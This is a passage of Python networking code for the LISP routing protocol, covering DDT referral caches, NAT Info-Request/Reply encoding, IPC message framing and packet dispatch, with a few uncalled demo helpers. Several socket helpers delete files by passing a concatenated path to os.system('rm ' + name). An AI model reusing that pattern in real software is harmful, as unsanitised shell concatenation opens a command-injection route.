        if (len(packet) < format_size): return(None)

        self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        return(packet)

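#
# Illustrative sketch only: the first long of a Map-Referral carries the
# message type in the top 4 bits and the record-count in the low byte, as
# lisp_map_referral.encode()/decode() above show. The record-count of 3
# is invented and the _demo helper is never called by this module.
#
def _map_referral_first_long_demo():
    import struct
    import socket

    first_long = (LISP_MAP_REFERRAL << 28) | 3
    wire = struct.pack("I", socket.htonl(first_long))
    decoded = socket.ntohl(struct.unpack("I", wire)[0])
    return(decoded & 0xff)    # record-count of 3
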
#
# lisp_ddt_entry
#
# One entry in the DDT cache, describing an EID-prefix and the set of
# DDT nodes it is delegated to.
#
class lisp_ddt_entry(object):
    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.delegation_set = []
        self.source_cache = None
        self.map_referrals_sent = 0

    def is_auth_prefix(self):
        if (len(self.delegation_set) != 0): return(False)
        if (self.is_star_g()): return(False)
        return(True)

    def is_ms_peer_entry(self):
        if (len(self.delegation_set) == 0): return(False)
        return(self.delegation_set[0].is_ms_peer())

    def print_referral_type(self):
        if (len(self.delegation_set) == 0): return("unknown")
        ddt_node = self.delegation_set[0]
        return(ddt_node.print_node_type())

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))

    def add_cache(self):
        if (self.group.is_null()):
            lisp_ddt_cache.add_cache(self.eid, self)
        else:
            ddt_entry = lisp_ddt_cache.lookup_cache(self.group, True)
            if (ddt_entry == None):
                ddt_entry = lisp_ddt_entry()
                ddt_entry.eid.copy_address(self.group)
                ddt_entry.group.copy_address(self.group)
                lisp_ddt_cache.add_cache(self.group, ddt_entry)

            if (self.eid.is_null()):
                self.eid.make_default_route(ddt_entry.group)
            ddt_entry.add_source_entry(self)

    def add_source_entry(self, source_ddt):
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ddt.eid, source_ddt)

    def lookup_source_cache(self, source, exact):
        if (self.source_cache == None): return(None)
        return(self.source_cache.lookup_cache(source, exact))

    def is_star_g(self):
        if (self.group.is_null()): return(False)
        return(self.eid.is_exact_match(self.group))

#
# lisp_ddt_node
#
# One delegated DDT node: either a DDT child, a map-server child, or a
# map-server peer.
#
class lisp_ddt_node(object):
    def __init__(self):
        self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.map_server_peer = False
        self.map_server_child = False
        self.priority = 0
        self.weight = 0

    def print_node_type(self):
        if (self.is_ddt_child()): return("ddt-child")
        if (self.is_ms_child()): return("map-server-child")
        if (self.is_ms_peer()): return("map-server-peer")

    def is_ddt_child(self):
        if (self.map_server_child): return(False)
        if (self.map_server_peer): return(False)
        return(True)

    def is_ms_child(self):
        return(self.map_server_child)

    def is_ms_peer(self):
        return(self.map_server_peer)

#
# lisp_ddt_map_request
#
# A Map-Request queued by a Map-Resolver while it walks the DDT
# hierarchy on behalf of an (P)ITR.
#
class lisp_ddt_map_request(object):
    def __init__(self, lisp_sockets, packet, eid, group, nonce):
        self.uptime = lisp_get_timestamp()
        self.lisp_sockets = lisp_sockets
        self.packet = packet
        self.eid = eid
        self.group = group
        self.nonce = nonce
        self.mr_source = None
        self.sport = 0
        self.itr = None
        self.retry_count = 0
        self.send_count = 0
        self.retransmit_timer = None
        self.last_request_sent_to = None
        self.from_pitr = False
        self.tried_root = False
        self.last_cached_prefix = [None, None]

    def print_ddt_map_request(self):
        lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
            "P" if self.from_pitr else "",
            red(self.itr.print_address(), False),
            green(self.eid.print_address(), False), self.nonce))

    def queue_map_request(self):
        self.retransmit_timer = threading.Timer( \
            LISP_DDT_MAP_REQUEST_INTERVAL,
            lisp_retransmit_ddt_map_request, [self])
        self.retransmit_timer.start()
        lisp_ddt_map_requestQ[str(self.nonce)] = self

    def dequeue_map_request(self):
        self.retransmit_timer.cancel()

        #
        # The queue is keyed by str(nonce), so test membership with the
        # string form as well (the integer nonce would never match).
        #
        if (str(self.nonce) in lisp_ddt_map_requestQ):
            lisp_ddt_map_requestQ.pop(str(self.nonce))

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))

#
# Map-Referral action values.
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH

lisp_map_referral_action_string = [
    "node-referral", "ms-referral", "ms-ack", "ms-not-registered",
    "delegation-hole", "not-authoritative"]

#
# lisp_info
#
# NAT-traversal Info-Request and Info-Reply messages.
#
class lisp_info(object):
    def __init__(self):
        self.info_reply = False
        self.nonce = 0
        self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.ms_port = 0
        self.etr_port = 0
        self.rtr_list = []
        self.hostname = lisp_hostname

    def print_info(self):
        if (self.info_reply):
            req_or_reply = "Info-Reply"
            rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
                "ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
                self.ms_port, self.etr_port,
                red(self.global_etr_rloc.print_address_no_iid(), False),
                red(self.global_ms_rloc.print_address_no_iid(), False),
                red(self.private_etr_rloc.print_address_no_iid(), False))
            if (len(self.rtr_list) == 0): rloc += "empty, "
            for rtr in self.rtr_list:
                rloc += red(rtr.print_address_no_iid(), False) + ", "

            rloc = rloc[0:-2]
        else:
            req_or_reply = "Info-Request"
            hostname = "<none>" if self.hostname == None else self.hostname
            rloc = ", hostname: {}".format(blue(hostname, False))

        lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
            lisp_hex_string(self.nonce), rloc))

    def encode(self):
        first_long = (LISP_NAT_INFO << 28)
        if (self.info_reply): first_long |= (1 << 27)

        #
        # Fill in the header: first long, nonce, and zeroed key-id,
        # auth-len, and TTL fields.
        #
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        packet += struct.pack("III", 0, 0, 0)

        #
        # An Info-Request carries just the hostname (AFI name encoded)
        # and is done.
        #
        if (self.info_reply == False):
            if (self.hostname == None):
                packet += struct.pack("H", 0)
            else:
                packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
                packet += (self.hostname + "\0").encode()

            return(packet)

        #
        # An Info-Reply appends a NAT LCAF with ms-port, etr-port, the
        # global and private ETR RLOCs, and the RTR list.
        #
        afi = socket.htons(LISP_AFI_LCAF)
        lcaf_type = LISP_LCAF_NAT_TYPE
        lcaf_len = socket.htons(16)
        ms_port = socket.htons(self.ms_port)
        etr_port = socket.htons(self.etr_port)
        packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
            ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
        packet += self.global_etr_rloc.pack_address()
        packet += struct.pack("HH", 0,
            socket.htons(self.private_etr_rloc.afi))
        packet += self.private_etr_rloc.pack_address()
        if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)

        for rtr in self.rtr_list:
            packet += struct.pack("H", socket.htons(rtr.afi))
            packet += rtr.pack_address()

        return(packet)

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])

        first_long = socket.ntohl(first_long)
        self.nonce = nonce[0]
        self.info_reply = first_long & 0x08000000
        self.hostname = None
        packet = packet[format_size::]

        #
        # Parse key-id and auth-len; Info messages carry no
        # authentication data, so a non-zero auth-len is an error.
        #
        packet_format = "HH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        key_id, auth_len = struct.unpack(packet_format,
            packet[:format_size])
        if (auth_len != 0): return(None)

        packet = packet[format_size::]
        packet_format = "IBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        ttl, rsvd, key_id, auth_len = struct.unpack(packet_format,
            packet[:format_size])

        if (auth_len != 0): return(None)
        packet = packet[format_size::]

        #
        # An Info-Request carries an optional hostname and is done.
        #
        if (self.info_reply == False):
            packet_format = "H"
            format_size = struct.calcsize(packet_format)
            if (len(packet) >= format_size):
                afi = struct.unpack(packet_format,
                    packet[:format_size])[0]
                if (socket.ntohs(afi) == LISP_AFI_NAME):
                    packet = packet[format_size::]
                    packet, self.hostname = lisp_decode_dist_name(packet)

            return(orig_packet)

        #
        # An Info-Reply carries a NAT LCAF with port and RLOC values.
        #
        packet_format = "HHBBHHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi, rsvd, lcaf_type, flags, lcaf_len, ms_port, etr_port = \
            struct.unpack(packet_format, packet[:format_size])

        if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)

        self.ms_port = socket.ntohs(ms_port)
        self.etr_port = socket.ntohs(etr_port)
        packet = packet[format_size::]

        #
        # Get the global ETR RLOC address.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_etr_rloc.afi = socket.ntohs(afi)
            packet = self.global_etr_rloc.unpack_address(packet)
            if (packet == None): return(None)
            self.global_etr_rloc.mask_len = \
                self.global_etr_rloc.host_mask_len()

        #
        # Get the global MS RLOC address, if present.
        #
        if (len(packet) < format_size): return(orig_packet)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_ms_rloc.afi = socket.ntohs(afi)
            packet = self.global_ms_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.global_ms_rloc.mask_len = \
                self.global_ms_rloc.host_mask_len()

        #
        # Get the private ETR RLOC address, if present.
        #
        if (len(packet) < format_size): return(orig_packet)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.private_etr_rloc.afi = socket.ntohs(afi)
            packet = self.private_etr_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.private_etr_rloc.mask_len = \
                self.private_etr_rloc.host_mask_len()

        #
        # Get the RTR list, if present.
        #
        while (len(packet) >= format_size):
            afi = struct.unpack(packet_format, packet[:format_size])[0]
            packet = packet[format_size::]
            if (afi == 0): continue
            rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
            packet = rtr.unpack_address(packet)
            if (packet == None): return(orig_packet)
            rtr.mask_len = rtr.host_mask_len()
            self.rtr_list.append(rtr)

        return(orig_packet)

#
# lisp_nat_info
#
# State for an ETR learned through an Info-Request arriving from behind
# a NAT.
#
class lisp_nat_info(object):
    def __init__(self, addr_str, hostname, port):
        self.address = addr_str
        self.hostname = hostname
        self.port = port
        self.uptime = lisp_get_timestamp()

    def timed_out(self):
        elapsed = time.time() - self.uptime
        return(elapsed >= (LISP_INFO_INTERVAL * 2))

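#
# Illustrative sketch only: lisp_nat_info.timed_out() fires once two
# Info-Request intervals have elapsed; backdating uptime simulates that.
# The address, hostname, and port values are invented and the _demo
# helper is never called by this module.
#
def _nat_info_timeout_demo():
    info = lisp_nat_info("10.0.0.2", "etr-demo", 4341)
    info.uptime -= LISP_INFO_INTERVAL * 2
    return(info.timed_out())    # True
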
#
# lisp_info_source
#
# State for the source of an Info-Request, cached by address and by
# nonce so the Info-Reply can be matched back.
#
class lisp_info_source(object):
    def __init__(self, hostname, addr_str, port):
        self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
        self.port = port
        self.uptime = lisp_get_timestamp()
        self.nonce = None
        self.hostname = hostname
        self.no_timeout = False

    def cache_address_for_info_source(self):
        key = self.address.print_address_no_iid() + self.hostname
        lisp_info_sources_by_address[key] = self

    def cache_nonce_for_info_source(self, nonce):
        self.nonce = nonce
        lisp_info_sources_by_nonce[nonce] = self

#
# lisp_concat_auth_data
#
# Byte-swap (on little-endian x86) and zero-fill the unpacked
# authentication words, then concatenate them into one hex string.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):

    if (lisp_is_x86()):
        if (auth1 != ""): auth1 = byte_swap_64(auth1)
        if (auth2 != ""): auth2 = byte_swap_64(auth2)
        if (auth3 != ""):
            if (alg_id == LISP_SHA_1_96_ALG_ID):
                auth3 = socket.ntohl(auth3)
            else:
                auth3 = byte_swap_64(auth3)

        if (auth4 != ""): auth4 = byte_swap_64(auth4)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        auth1 = lisp_hex_string(auth1)
        auth1 = auth1.zfill(16)
        auth2 = lisp_hex_string(auth2)
        auth2 = auth2.zfill(16)
        auth3 = lisp_hex_string(auth3)
        auth3 = auth3.zfill(8)
        auth_data = auth1 + auth2 + auth3

    if (alg_id == LISP_SHA_256_128_ALG_ID):
        auth1 = lisp_hex_string(auth1)
        auth1 = auth1.zfill(16)
        auth2 = lisp_hex_string(auth2)
        auth2 = auth2.zfill(16)
        auth3 = lisp_hex_string(auth3)
        auth3 = auth3.zfill(16)
        auth4 = lisp_hex_string(auth4)
        auth4 = auth4.zfill(16)
        auth_data = auth1 + auth2 + auth3 + auth4

    return(auth_data)

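#
# Illustrative sketch only: for SHA1-96, lisp_concat_auth_data() above
# zero-fills two 16-hex-digit longs and one 8-hex-digit word, yielding
# 40 hex digits (20 bytes of authentication data). The word values are
# invented and the _demo helper is never called by this module.
#
def _auth_zfill_demo():
    auth1 = lisp_hex_string(0x1122334455667788).zfill(16)
    auth2 = lisp_hex_string(0x99aabbccddeeff00).zfill(16)
    auth3 = lisp_hex_string(0x11223344).zfill(8)
    return(len(auth1 + auth2 + auth3) == 40)
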
#
# lisp_open_listen_socket
#
# Open a UDP listen socket when port is numeric, otherwise a named
# AF_UNIX datagram socket for intra-process IPC.
#
def lisp_open_listen_socket(local_addr, port):
    if (port.isdigit()):
        if (local_addr.find(".") != -1):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if (local_addr.find(":") != -1):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)

        sock.bind((local_addr, int(port)))
    else:
        name = port
        if (os.path.exists(name)):
            os.system("rm " + name)
            time.sleep(1)

        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(name)

    return(sock)

#
# lisp_open_send_socket
#
# Open a send socket: a plain UDP socket when no internal name is
# given, otherwise a named AF_UNIX datagram socket.
#
def lisp_open_send_socket(internal_name, afi):
    if (internal_name == ""):
        if (afi == LISP_AFI_IPV4):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if (afi == LISP_AFI_IPV6):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    else:
        if (os.path.exists(internal_name)):
            os.system("rm " + internal_name)
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(internal_name)

    return(sock)

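#
# Illustrative sketch only: with an empty internal name,
# lisp_open_send_socket() returns a plain UDP socket. The _demo helper
# is hypothetical and never called by this module.
#
def _send_socket_demo():
    sock = lisp_open_send_socket("", LISP_AFI_IPV4)
    if (sock != None): sock.close()
    return(sock != None)
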
#
# lisp_close_socket
#
# Close a socket and remove its AF_UNIX name if one exists.
#
def lisp_close_socket(sock, internal_name):
    sock.close()
    if (os.path.exists(internal_name)): os.system("rm " + internal_name)
    return

#
# lisp_is_running
#
# A LISP component process is considered running if its named AF_UNIX
# socket exists in the filesystem.
#
def lisp_is_running(node):
    return(True if (os.path.exists(node)) else False)

#
# lisp_packet_ipc
#
# Prepend a "packet@<length>@<source>@<sport>@" header for IPC delivery.
#
def lisp_packet_ipc(packet, source, sport):
    header = "packet@{}@{}@{}@".format(str(len(packet)), source,
        str(sport))
    return(header.encode() + packet)

#
# lisp_control_packet_ipc
#
# Prepend a "control-packet@<dest>@<dport>@" header for IPC delivery.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
    header = "control-packet@{}@{}@".format(dest, str(dport))
    return(header.encode() + packet)

#
# lisp_data_packet_ipc
#
# Prepend a "data-packet@<length>@<source>@@" header for IPC delivery.
#
def lisp_data_packet_ipc(packet, source):
    header = "data-packet@{}@{}@@".format(str(len(packet)), source)
    return(header.encode() + packet)

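#
# Illustrative sketch only: the IPC messages above put "@"-delimited
# header fields in front of the payload, so a bounded split recovers the
# fields even when the payload itself contains "@" bytes. The payload
# bytes are invented and the _demo helper is never called by this module.
#
def _packet_ipc_parse_demo():
    ipc = lisp_packet_ipc(b"\x12\x34", "lisp-itr", 4342)
    msg_type, length, source, sport = ipc.split(b"@", 4)[0:4]
    return(msg_type == b"packet" and source == b"lisp-itr")
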
#
# lisp_command_ipc
#
# Prepend a "command@<length>@<source>@@" header for IPC delivery.
#
def lisp_command_ipc(ipc, source):
    packet = "command@{}@{}@@".format(len(ipc), source) + ipc
    return(packet.encode())

#
# lisp_api_ipc
#
# Prepend an "api@<length>@<source>@@" header for IPC delivery.
#
def lisp_api_ipc(source, data):
    packet = "api@" + str(len(data)) + "@" + source + "@@" + data
    return(packet.encode())


#
# lisp_ipc
#
# Send an IPC message to another lispers.net process, segmenting it to the
# socket's limits and retrying with exponential backoff on send failures.
#
def lisp_ipc(packet, send_socket, node):

    #
    # Don't do anything if the destination process is not running.
    #
    if (lisp_is_running(node) == False):
        lprint("Suppress sending IPC to {}".format(node))
        return

    #
    # Control packets can be segmented at a larger size than data packets.
    #
    segment_size = 1500 if (packet.find(b"control-packet") == -1) else 9000

    offset = 0
    length = len(packet)
    retry_count = 0
    sleep_time = .001
    while (length > 0):
        segment_len = min(length, segment_size)
        segment = packet[offset:segment_len + offset]

        try:
            if (type(segment) == str): segment = segment.encode()
            send_socket.sendto(segment, node)
            lprint("Send IPC {}-out-of-{} byte to {} succeeded".format(
                len(segment), len(packet), node))
            retry_count = 0
            sleep_time = .001
        except socket.error as e:
            if (retry_count == 12):
                lprint("Giving up on {}, consider it down".format(node))
                break

            lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format(
                len(segment), len(packet), node, e))

            retry_count += 1
            time.sleep(sleep_time)

            lprint("Retrying after {} ms ...".format(sleep_time * 1000))
            sleep_time *= 2
            continue

        offset += segment_len
        length -= segment_len
    return
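
#
# Illustrative sketch (hypothetical helper, never called): the retry policy
# used by lisp_ipc() above starts at 1 ms and doubles per consecutive
# failure, so the twelfth and final wait is about 2 seconds.
#
def _example_ipc_backoff_delays():
    delays = []
    sleep_time = .001
    for _ in range(12):
        delays.append(sleep_time)
        sleep_time *= 2
    return delays  # [0.001, 0.002, 0.004, ..., 2.048]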

#
# lisp_format_packet
#
# Return a packet as a printable hex string, grouped into 8-nibble
# (4-byte) words separated by spaces.
#
def lisp_format_packet(packet):
    packet = binascii.hexlify(packet)
    offset = 0
    output = b""
    length = len(packet) * 2
    while (offset < length):
        output += packet[offset:offset + 8] + b" "
        offset += 8
        length -= 4
    return (output.decode())
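
#
# Illustrative sketch (hypothetical helper, never called): shows the word
# grouping produced by lisp_format_packet() above.
#
def _example_format_packet():
    output = lisp_format_packet(b"\x12\x34\x56\x78\x9a\xbc")
    assert output.startswith("12345678 9abc")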

#
# lisp_send
#
# Send a LISP control packet on the IPv4 or IPv6 socket, depending on the
# destination address. RLOC-probes are sent with a specific TTL.
#
def lisp_send(lisp_sockets, dest, port, packet):
    lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]

    #
    # An IPv4-mapped IPv6 address (::ffff:<dotted-quad>) is sent on the
    # IPv4 socket.
    #
    address = dest.print_address_no_iid()
    if (address.find("::ffff:") != -1 and address.count(".") == 3):
        if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
        if (lisp_socket == None):
            lisp_socket = lisp_sockets[0]
            address = address.split("::ffff:")[-1]

    lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
        len(packet), bold("to " + address, False), port,
        lisp_format_packet(packet)))

    #
    # Set the configured TTL for RLOC-probe requests and replies (first
    # byte 0x12 is a probe Map-Request, 0x28 a probe Map-Reply).
    #
    set_ttl = (LISP_RLOC_PROBE_TTL == 128)
    if (set_ttl):
        lisp_type = struct.unpack("B", packet[0:1])[0]
        set_ttl = (lisp_type in [0x12, 0x28])
        if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)

    try: lisp_socket.sendto(packet, (address, port))
    except socket.error as e:
        lprint("socket.sendto() failed: {}".format(e))

    #
    # Restore the default TTL if it was changed.
    #
    if (set_ttl): lisp_set_ttl(lisp_socket, 64)
    return

#
# lisp_receive_segments
#
# Reassemble a segmented IPC message. Returns [True, packet] when the
# message is complete, or [False, <data>] when reassembly was interrupted.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):

    #
    # If the first segment carried the entire message, we are done.
    #
    segment_len = total_length - len(packet)
    if (segment_len == 0): return ([True, packet])

    lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
        total_length, source))

    #
    # Read segments until the advertised total length is reached.
    #
    length = segment_len
    while (length > 0):
        try: segment = lisp_socket.recvfrom(9000)
        except: return ([False, None])

        segment = segment[0]

        #
        # A new message started while we were reassembling an old one;
        # discard the old one and hand back the new data.
        #
        message = segment.decode()
        if (message.find("packet@") == 0):
            message = message.split("@")
            lprint("Received new message ({}-out-of-{}) while receiving " + \
                "fragments, old message discarded", len(segment),
                message[1] if len(message) > 2 else "?")
            return ([False, segment])

        length -= len(segment)
        packet += segment

        lprint("Received {}-out-of-{} byte segment from {}".format(
            len(segment), total_length, source))

    return ([True, packet])

#
# lisp_bit_stuff
#
# The IPC framing splits on "@" (0x40), so a payload containing "@" arrives
# as multiple pieces; rejoin them with the delimiter restored.
#
def lisp_bit_stuff(payload):
    lprint("Bit-stuffing, found {} segments".format(len(payload)))
    packet = b""
    for segment in payload: packet += segment + b"\x40"
    return (packet[:-1])
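
#
# Illustrative sketch (hypothetical helper, never called): a payload of
# b"a@b@c" splits into three pieces at the framing layer and is restored
# by lisp_bit_stuff() above.
#
def _example_bit_stuff():
    segments = b"a@b@c".split(b"@")  # [b"a", b"b", b"c"]
    assert lisp_bit_stuff(segments) == b"a@b@c"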

#
# lisp_receive
#
# Receive a packet from a socket. For an external socket, return the raw
# packet. For an internal IPC socket, parse the "type@length@source@@payload"
# framing, reassembling segmented messages as needed. Returns a list of
# [opcode, source, port, packet].
#
def lisp_receive(lisp_socket, internal):
    while (True):
        try: data = lisp_socket.recvfrom(9000)
        except: return (["", "", "", ""])

        #
        # External sockets carry no IPC header.
        #
        if (internal == False):
            packet = data[0]
            source = lisp_convert_6to4(data[1][0])
            port = data[1][1]

            if (port == LISP_DATA_PORT):
                do_log = lisp_data_plane_logging
                packet_str = lisp_format_packet(packet[0:60]) + " ..."
            else:
                do_log = True
                packet_str = lisp_format_packet(packet)

            if (do_log):
                lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
                    False), len(packet), bold("from " + source, False), port,
                    packet_str))
            return (["packet", source, port, packet])

        #
        # Internal IPC message; parse header fields and reassemble.
        #
        all_segments = False
        message = data[0]
        if (type(message) == str): message = message.encode()
        discard = False

        while (all_segments == False):
            message = message.split(b"@")

            if (len(message) < 4):
                lprint("Possible fragment (length {}), from old message, " + \
                    "discarding", len(message[0]))
                discard = True
                break

            opcode = message[0].decode()
            try:
                total_length = int(message[1])
            except:
                error = bold("Internal packet reassembly error", False)
                lprint("{}: {}".format(error, data))
                discard = True
                break

            source = message[2].decode()
            port = message[3].decode()

            #
            # If the payload itself contained "@", splitting produced extra
            # pieces; bit-stuff them back together.
            #
            if (len(message) > 5):
                packet = lisp_bit_stuff(message[4::])
            else:
                packet = message[4]

            #
            # Pull in the remaining segments of this message, if any.
            #
            all_segments, packet = lisp_receive_segments(lisp_socket, packet,
                source, total_length)
            if (packet == None): return (["", "", "", ""])

            #
            # A new message preempted reassembly; parse it from the top.
            #
            if (all_segments == False):
                message = packet
                continue

            if (port == ""): port = "no-port"
            if (opcode == "command" and lisp_i_am_core == False):
                index = packet.find(b" {")
                command = packet if index == -1 else packet[:index]
                command = ": '" + command.decode() + "'"
            else:
                command = ""

            lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
                len(packet), bold("from " + source, False), port, opcode,
                command if (opcode in ["command", "api"]) else ": ... " if \
                (opcode == "data-packet") else ": " + \
                lisp_format_packet(packet)))

        if (discard): continue
        return ([opcode, source, port, packet])
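
#
# Illustrative sketch (hypothetical helper and values, never called): the
# internal header parsed above is plain text up to the "@@" separator, with
# an empty port field for locally generated messages.
#
def _example_parse_ipc_header():
    message = b"api@7@lisp-ms@@payload"
    opcode, total_length, source, port, payload = message.split(b"@", 4)
    assert (opcode, int(total_length), source) == (b"api", 7, b"lisp-ms")
    assert (port, payload) == (b"", b"payload")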

#
# lisp_parse_packet
#
# Dispatch a received LISP control packet based on its header type.
# Returns True when an Info-Reply indicates RLOC-probing should trigger.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
    trigger_flag = False
    timestamp = time.time()

    header = lisp_control_header()
    if (header.decode(packet) == None):
        lprint("Could not decode control header")
        return (trigger_flag)

    #
    # Convert the source to a lisp_address() unless it names an internal
    # process like "lisp-etr".
    #
    source_name = source
    if (source.find("lisp") == -1):
        address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        address.string_to_afi(source)
        address.store_address(source)
        source = address

    if (header.type == LISP_MAP_REQUEST):
        lisp_process_map_request(lisp_sockets, packet, None, 0, source,
            udp_sport, False, ttl, timestamp)

    elif (header.type == LISP_MAP_REPLY):
        lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)

    elif (header.type == LISP_MAP_REGISTER):
        lisp_process_map_register(lisp_sockets, packet, source, udp_sport)

    elif (header.type == LISP_MAP_NOTIFY):
        if (source_name == "lisp-etr"):
            lisp_process_multicast_map_notify(packet, source)
        elif (lisp_is_running("lisp-rtr")):
            lisp_process_multicast_map_notify(packet, source)
        elif (lisp_is_running("lisp-itr")):
            lisp_process_unicast_map_notify(lisp_sockets, packet, source)

    elif (header.type == LISP_MAP_NOTIFY_ACK):
        lisp_process_map_notify_ack(packet, source)

    elif (header.type == LISP_MAP_REFERRAL):
        lisp_process_map_referral(lisp_sockets, packet, source)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
        _, __, trigger_flag = lisp_process_info_reply(source, packet, True)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
        address_str = source.print_address_no_iid()
        lisp_process_info_request(lisp_sockets, packet, address_str,
            udp_sport, None)

    elif (header.type == LISP_ECM):
        lisp_process_ecm(lisp_sockets, packet, source, udp_sport)

    else:
        lprint("Invalid LISP control packet type {}".format(header.type))

    return (trigger_flag)
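
#
# Illustrative sketch (commented out; an alternative, not the code path
# used above): the type dispatch could be table-driven for handlers that
# share a signature, at the cost of hiding the per-type argument
# differences the if/elif chain makes explicit.
#
# _LISP_CONTROL_DISPATCH = {
#     LISP_MAP_REPLY: lisp_process_map_reply,
#     LISP_MAP_NOTIFY_ACK: lisp_process_map_notify_ack,
#     LISP_MAP_REFERRAL: lisp_process_map_referral,
# }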

#
# lisp_process_rloc_probe_request
#
# Answer an RLOC-probe Map-Request if this process is an ETR or RTR.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
    ttl, timestamp):

    probe = bold("RLOC-probe", False)

    if (lisp_i_am_etr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
            ttl, timestamp)
        return

    if (lisp_i_am_rtr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
            ttl, timestamp)
        return

    lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(
        probe))
    return

#
# lisp_process_smr
#
def lisp_process_smr(map_request):
    lprint("Received SMR-based Map-Request")
    return

#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
    lprint("Received SMR-invoked Map-Request")
    return

#
# lisp_build_map_reply
#
# Build a Map-Reply: a reply header, one EID-record, and one RLOC-record
# per entry in the RLOC-set (plus an optional JSON telemetry record).
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl,
    map_request, keys, enc, auth, mr_ttl=-1):

    rloc_probe = map_request.rloc_probe if (map_request != None) else False
    json_telemetry = map_request.json_telemetry if (map_request != None) \
        else None

    map_reply = lisp_map_reply()
    map_reply.rloc_probe = rloc_probe
    map_reply.echo_nonce_capable = enc
    map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
    map_reply.record_count = 1
    map_reply.nonce = nonce
    packet = map_reply.encode()
    map_reply.print_map_reply()

    eid_record = lisp_eid_record()
    eid_record.rloc_count = len(rloc_set)
    if (json_telemetry != None): eid_record.rloc_count += 1
    eid_record.authoritative = auth
    eid_record.record_ttl = ttl
    eid_record.action = action
    eid_record.eid = eid
    eid_record.group = group

